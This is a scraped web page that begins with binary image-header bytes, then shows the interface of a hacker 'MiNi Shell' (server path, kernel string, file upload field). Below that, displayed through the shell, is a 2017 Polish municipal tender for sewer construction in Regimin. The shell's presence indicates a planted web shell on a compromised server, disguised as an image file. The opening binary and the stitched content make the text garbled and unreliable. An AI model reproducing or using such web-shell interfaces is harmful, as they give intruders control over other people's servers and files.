JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170411/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170411/63343-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.regimin.pl lub www.bip.regimin.pl' target='_blank'>http://www.regimin.pl lub www.bip.regimin.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 63343 - 2017
              z dnia 2017-04-11 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Regimin: BUDOWA KANALIZACJI SANITARNEJ NA TERENIE GMINY REGIMIN - IV ETAP  TARGONIE  LEKOWO Z PODZIAŁEM NA ZADANIA:

ZADANIE 1: BUDOWA KANALIZACJI SANITARNEJ NA TERENIE GMINY REGIMIN - 
                     IV ETAP  TARGONIE  LEKOWO (SIEĆ KANALIZACJI + 
                     PRZYKANALIKI)

ZADANIE 2:  BUDOWA KANALIZACJI SANITARNEJ NA TERENIE GMINY REGIMIN 
                      - IV ETAP  TARGONIE  LEKOWO (ODTWORZENIE NAWIERZCHNI Z 
                       MIESZANEK MINERALNO-BITUMICZNYCH ASFALTOWYCH)
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Urząd Gminy w Regiminie, krajowy numer identyfikacyjny
              55047900000, ul.
              Regimin 
              22,
              06461  
              Regimin, woj.
              mazowieckie, państwo
              Polska, tel.
              236 811 756, e-mail
              georegimin@o2.pl, faks
              236 811 756.
              <br />
              Adres strony internetowej (URL): www.regimin.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.regimin.pl lub www.bip.regimin.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.regimin.pl lub www.bip.regimin.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferta powinna byćsporządzona z zchowaniem formy pisemnej<br />
                Adres:
                <br />URZĄD GMINY W REGIMINIE, REGIMIN 22, 06-461 REGIMIN</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>BUDOWA KANALIZACJI SANITARNEJ NA TERENIE GMINY REGIMIN - IV ETAP  TARGONIE  LEKOWO Z PODZIAŁEM NA ZADANIA:

ZADANIE 1: BUDOWA KANALIZACJI SANITARNEJ NA TERENIE GMINY REGIMIN - 
                     IV ETAP  TARGONIE  LEKOWO (SIEĆ KANALIZACJI + 
                     PRZYKANALIKI)

ZADANIE 2:  BUDOWA KANALIZACJI SANITARNEJ NA TERENIE GMINY REGIMIN 
                      - IV ETAP  TARGONIE  LEKOWO (ODTWORZENIE NAWIERZCHNI Z 
                       MIESZANEK MINERALNO-BITUMICZNYCH ASFALTOWYCH)
<br /><b>Numer referencyjny: </b>Numer sprawy:  03/17<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>ZADANIE 1: BUDOWA KANALIZACJI SANITARNEJ NA TERENIE GMINY REGIMIN - IV ETAP  
                     TARGONIE  LEKOWO (SIEĆ KANALIZACJI + PRZYKANALIKI)

- Sieć śr. DN200 i DN160 mm - Roboty ziemne i zabezpieczające.
- Sieć śr. DN200 i DN160 mm - Roboty technologiczne sieci.
- Odwodnienie wykopów pod sieć i przepompownie.
- Przepompownie ścieków roboty ziemnie i zabezpieczające.
- Przepompownie ścieków 
- Przyłącze elektryczne do przepompowni ścieków
- przykanaliki kanalizacji sanitarnej DN160 do pierwszej studni  roboty ziemne
- przykanaliki kanalizacji sanitarnej DN160 do pierwszej studni  roboty technologiczne

ZADANIE 2: BUDOWA KANALIZACJI SANITARNEJ NA TERENIE GMINY REGIMIN - IV ETAP  
                     TARGONIE  LEKOWO (ODTWORZENIE NAWIERZCHNI Z MIESZANEK MINERALNO-
                     BITUMICZNYCH ASFALTOWYCH)

- Odtworzenie nawierzchni - sieć DN200
- Odtworzenie nawierzchni - sieć DN160.

Zakres i wielkość zamówienia przedstawione zostały w projekcie budowlanym i przedmiarze robót   (format PDF) zamieszczonych na naszej stronie (www.regimin.pl), projekt budowlany jest również do wglądu w siedzibie zamawiającego.
UWAGA
Podstawę do wyceny oferty stanowi dokumentacja projektowa. Załączone przedmiary robót mają jedynie charakter informacyjny i mogą być traktowane tylko, jako materiał pomocniczy.
Winny być sprawdzone i ewentualnie skorygowane na podstawie analizy dokumentacji projektowej i dokonanej wizji lokalnej w terenie. 
<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>45200000-9,
                45231300-8,
                45111300-8,
                45111200-0,
                45233142-6,
                45233220-7,
                <br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/10/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 30/11/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>DATA ZAKOŃCZENIA ZADANIA:
ZADANIE 1: 30.10.2017
ZADANIE 2: 30.11.2017</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                DOTYCZY TYLKO ZADANIA 1
Wykonawca musi wykazać, że posiada własne środki finansowe lub zdolność 
kredytową w wysokości, co najmniej 2 mln zł. (słownie: dwa miliony 00/100 złotych),
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Opis sposobu dokonania oceny spełniania warunku:

    a) Przy wykazie robót Wykonawca winien wykazać, że wykonał minimum dwie roboty     
                     odpowiadające rodzajem przedmiotowemu zamówieniu Zadanie 1: 
                      budowa sieci kanalizacji sanitarnej o wartości robót za minimum 1 800 000,00 zł 
                     brutto. Zadanie 2: odtworzenie nawierzchni o wartości za minimum 100 000,00 zł brutto 
                     związanych z przebudową, rozbudową lub modernizacją dróg o nawierzchni bitumicznej. 
          Ocena spełniania warunku będzie dokonana zgodnie z formułą spełnia/nie spełnia, na      
                      podstawie złożonego wykazu wykonanych robót budowlanych i dokumentów 
                      potwierdzających, roboty zostały wykonane należycie i zgodnie z zasadami sztuki 
                      budowlanej oraz prawidłowo ukończone,

	    b)   Wykonawca musi wykazać, że dysponuje lub będzie dysponować w okresie przewidzianym 
                      na realizację zamówienia osobami legitymującymi się kwalifikacjami zawodowymi oraz 
                      doświadczeniem odpowiednim do objęcia funkcji, jaki zostaną im powierzone. 
                      (Załącznik Nr 9)
                      Wykonawca przedstawi w ofercie kandydata na stanowisko:

            Zadanie 1: Kierownik budowy posiadający uprawnienia budowlane w zakresie instalacji i 
                             sieci sanitarnych.  1 osoba

            Zadanie 2:   Kierownik budowy w specjalności drogowej  1 osoba

Wskazana osoba winna posiadać uprawnienia budowlane do kierowania robotami budowlanymi w w/w specjalności bez ograniczeń oraz posiadająca, co najmniej 12 letnie doświadczenie zawodowe.

Warunek w rozumieniu Zamawiającego spełni Wykonawca, który będzie dysponował co najmniej jedną osobą uprawnioną zgodnie z wymogami ustawy Prawo budowlane (Dz. U. z 2016 r, poz. 290 ze zm.) do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. kierownika budowy posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności 
Zadanie 1: sanitarnej,  Zadanie 2: drogowej 
  

	    c) oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy oraz 
                      liczebności kadry kierowniczej w ostatnich 3 latach przed upływem terminu składania ofert, a 
                     w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie 
                     (załącznik nr. 8)

Wymagany jest w celu potwierdzenia, że wykonawca dysponuje osobami zdolnymi do wykonania zamówienia.

    d) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w 
                     szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie 
                     robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, 
                     uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia 
                     publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o     
                     podstawie do dysponowania tymi osobami (załącznik nr. 10).

Zadanie 1
Ze względu na termin wykonania zamówienia wykonawca musi dysponować minimum 4 
             brygadami po 4 osoby nie licząc kierownika budowy. 
Wykonawca mysi dysponować minimum 16 osobami nie licząc kierownika budowy.
Każda z brygad musi byś wyposażona w koparkę lub koparko ładowarkę więc w każdej 
             brygadzie musi być operator z odpowiednimi uprawnieniami oraz każda z brygad musi 
             dysponować zagęszczarką.

W celu informacji o osobach, które zostaną skierowane do realizacji zamówienia a w czasie jej realizacji do możliwości skontrolowania przez zamawiającego czy wymienione osoby z wykazu rzeczywiście wykonują roboty przy realizacji inwestycji.
    
    e) wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w 
                     celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania  
                     tymi zasobami (załącznik nr 13) dotyczy tylko zadania nr 1
Minimalne ilości urządzeń i sprzętu potrzebnego do wykonania zamówienia: 
e1) koparka lub koparko ładowarka  4szt.
e2) zagęszczarka  4szt.
e3) samochody ciężarowe (transportowe)  2szt. 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1) informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 
                 ustawy oraz, odnośnie skazania za wykroczenie na karę aresztu, w zakresie określonym przez 
                zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy, wystawiona nie wcześniej niż 6 
                miesięcy przed upływem terminu składania ofert,

2) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie 
                zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem 
                terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł 
                porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z 
                ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem 
                zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości 
                wykonania decyzji właściwego organu,

3) zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń 
                  Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument 
                  potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne 
                  lub zdrowotne, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania 
                  ofert, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym 
                  organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w 
                  szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty 
                  zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,

4) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, 
                jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku 
                podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy,

           5) oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy 
                 kapitałowej
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed 
                    upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym  
                  okresie,

2) oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy oraz        
                    liczebności kadry kierowniczej w ostatnich 3 latach przed upływem terminu składania ofert, a 
                   w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie,

3) oświadczenia na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry  
                   kierowniczej wykonawcy,

4) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w 
                  szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie 
                   robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, 
                  doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także 
                  zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania 
                  tymi osobami.

5) wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w 
                  celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania  
                  tymi zasobami
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed 
                    upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym  
                   okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na  
                   rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te 
                   roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty 
                   zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy 
                   czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez 
                   podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej 
                    przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych 
        dokumentów - inne dokumenty,(załącznik nr 7)

Przy wykazie robót Wykonawca winien wykazać, że wykonał minimum dwie roboty     
                     odpowiadające rodzajem przedmiotowemu zamówieniu Zadanie 1: 
                      budowa sieci kanalizacji sanitarnej o wartości robót za minimum 1 800 000,00 zł 
                     brutto. Zadanie 2: odtworzenie nawierzchni o wartości za minimum 100 000,00 zł brutto związanych z przebudową, rozbudową lub modernizacją dróg o nawierzchni bitumicznej. 
          Ocena spełniania warunku będzie dokonana zgodnie z formułą spełnia/nie spełnia, na      
                      podstawie złożonego wykazu wykonanych robót budowlanych i dokumentów 
                      potwierdzających, roboty zostały wykonane należycie i zgodnie z zasadami sztuki 
                      budowlanej oraz prawidłowo ukończone,
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę

2) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu oraz o nie 
                 podleganiu wykluczeniu - wypełnione i podpisane przez wykonawcę, które stanowić będzie 
                 wstępne potwierdzenie spełnienia warunków udziału w postępowaniu oraz brak podstaw 
                 wykluczenia.

3) Wzór umowy   

4) Kosztorys ofertowy   wyliczone na podstawie projektu budowlanego i przedmiaru robót 
                 (kosztorys ofertowy stanowi element pomocniczy oraz informacyjny i nie podlega on ocenie)

5) Wykaz osób do kontaktów z zamawiającym (stanowi element pomocniczy oraz informacyjny i 
                nie podlega on ocenie)

6) Oferowane warunki gwarancji
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Ustala się wadium dla całości przedmiotu zamówienia (zadanie 1 i 2) w wysokości: 74 000 zł, słownie: siedemdziesiąt cztery tysiące złotych

